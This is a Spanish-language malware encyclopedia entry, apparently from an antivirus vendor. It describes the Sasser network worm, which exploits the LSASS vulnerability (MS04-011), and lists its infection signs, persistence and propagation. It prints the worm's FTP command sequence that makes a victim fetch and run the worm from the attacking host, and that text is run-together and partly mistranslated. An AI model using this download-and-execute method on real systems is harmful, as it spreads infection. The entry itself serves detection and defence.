Clase de padre: VirWare
Los virus y gusanos son programas maliciosos que se auto replican en computadoras o redes de computadoras sin que el usuario lo sepa; cada copia subsiguiente de dichos programas maliciosos también puede auto-replicarse. Los programas maliciosos que se propagan a través de redes o infectan máquinas remotas cuando el "propietario" les ordena hacerlo (p. Ej., Puertas traseras) o programas que crean copias múltiples que no pueden autorreplicarse no forman parte de la subclase Virus y gusanos. La principal característica utilizada para determinar si un programa está clasificado como un comportamiento separado dentro de la subclase Viruses and Worms es cómo se propaga el programa (es decir, cómo el programa malicioso distribuye copias de sí mismo a través de recursos locales o de red). como archivos enviados como archivos adjuntos de correo electrónico, a través de un enlace a un recurso web o FTP, a través de un enlace enviado en un mensaje ICQ o IRC, a través de redes de intercambio de archivos P2P, etc. Algunos gusanos se propagan como paquetes de red; estos penetran directamente en la memoria de la computadora y el código del gusano se activa. Los gusanos usan las siguientes técnicas para penetrar computadoras remotas y lanzar copias de sí mismos: ingeniería social (por ejemplo, un mensaje de correo electrónico que sugiere que el usuario abre un archivo adjunto), explotando errores de configuración de red (como copiar a un disco totalmente accesible) y explotando lagunas en el sistema operativo y la seguridad de las aplicaciones. Los virus se pueden dividir de acuerdo con el método utilizado para infectar una computadora: virus de archivos virus de sector de arranque virus de macros virus de script Cualquier programa dentro de esta subclase puede tener funciones de troyano adicionales. También se debe tener en cuenta que muchos gusanos usan más de un método para distribuir copias a través de redes. Las reglas para clasificar objetos detectados con funciones múltiples se deben usar para clasificar estos tipos de gusanos.Clase: Net-Worm
Net-Worms se propagan a través de redes informáticas. La característica distintiva de este tipo de gusano es que no requiere acción del usuario para propagarse. Este tipo de gusano generalmente busca vulnerabilidades críticas en el software que se ejecuta en las computadoras en red. Para infectar las computadoras en la red, el gusano envía un paquete de red especialmente diseñado (llamado exploit) y como resultado el código del gusano (o parte del código del gusano) penetra en la computadora de la víctima y se activa. A veces, el paquete de red solo contiene la parte del código del gusano que descargará y ejecutará un archivo que contiene el módulo principal del gusano. Algunos gusanos de red usan varios exploits simultáneamente para propagarse, lo que aumenta la velocidad a la que encuentran víctimas.Más información
Plataforma: Win32
Win32 es una API en sistemas operativos basados en Windows NT (Windows XP, Windows 7, etc.) que admite la ejecución de aplicaciones de 32 bits. Una de las plataformas de programación más extendidas en el mundo.Descripción
Sasser es un gusano de Internet que explota la vulnerabilidad MSASS LSASS descrita en el boletín de seguridad de Microsoft MS04-011 .
Microsoft lanzó un parche para esta vulnerabilidad el 13 de abril de 2004, mientras que Sasser.a se detectó por primera vez el 30 de abril de 2004.
Sasser opera de manera muy similar a Lovesan, excepto que Lovesan explotó una vulnerabilidad en el servicio DCOM de PRC, no en el servicio LSASS.
Sasser afecta a las computadoras que ejecutan Windows 2000, Windows XP, Windows Server 2003. Sasser funciona en todas las otras versiones de Windows pero no puede infectarlas atacando a través de la vulnerabilidad.
Sasser está escrito en C / C ++, utilizando el compilador de Visual C. El gusano pesa alrededor de 15 KL y está empacado por PECompact2.
Signos de infección
- el archivo 'avserve.exe' en el directorio de Windows.
- Un mensaje de error acerca de la falla del servicio LSASS que generalmente también hace que el sistema se reinicie.
Propagación
Después del lanzamiento, Sasser se copia en el directorio raíz de Windows con el nombre avserve.exe y registra este archivo en la clave de ejecución automática del registro del sistema:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] "avserve.exe" = "% WINDIR% avserve.exe"
Sasser crea un identificador único 'Jobaka31' en la RAM para localizar copias de sí mismo en caso de futuros intentos de infección.
Sasser lanza un servidor FTP en el puerto TCP 5554 y luego inicia 128 rutinas de propagación. Durante este proceso, el gusano intenta iniciar el proceso AbortSystemShutdown para prohibir el reinicio del sistema.
Sasser inicia un escaneo de direcciones IP para identificar las direcciones de las víctimas y envía una solicitud al puerto TCP 445. Si alguna máquina responde, Sasser explota la vulnerabilidad LSASS para lanzar un shell de comando 'cmd.exe' en el puerto TCP 9996. Finalmente Sasser, ordena a la máquina infectada que descargue y ejecute el componente principal del gusano con el nombre "N_up.exe", donde "N" es un número aleatorio:
echo apagadoecho open [dirección de la máquina atacante] 5554 >> cmd.ftpecho anonymous >> cmd.ftpusuario de ecoecho bin >> cmd.ftpecho get [random number] _up.exe >> cmd.ftpecho bye >> cmd.ftpecho enftp -s: cmd.ftp[número aleatorio] _up.exeecho apagadodel cmd.ftpecho en
Como resultado, una máquina puede ser atacada más de una vez y contener múltiples copias del gusano con nombres de muestra tales como:
23101_up.exe5409_up.exe
Etcétera.
Otro
Después de la infección, la máquina víctima genera un mensaje de error sobre un servicio LSASS que falla, con lo cual puede intentar reiniciarse.
Sasser crea el archivo 'win.log' en el directorio raíz de la unidad C donde el gusano registra las direcciones IP de todas las máquinas atacadas.
Leer más
Conozca las estadísticas de las vulnerabilidades que se propagan en su región statistics.securelist.com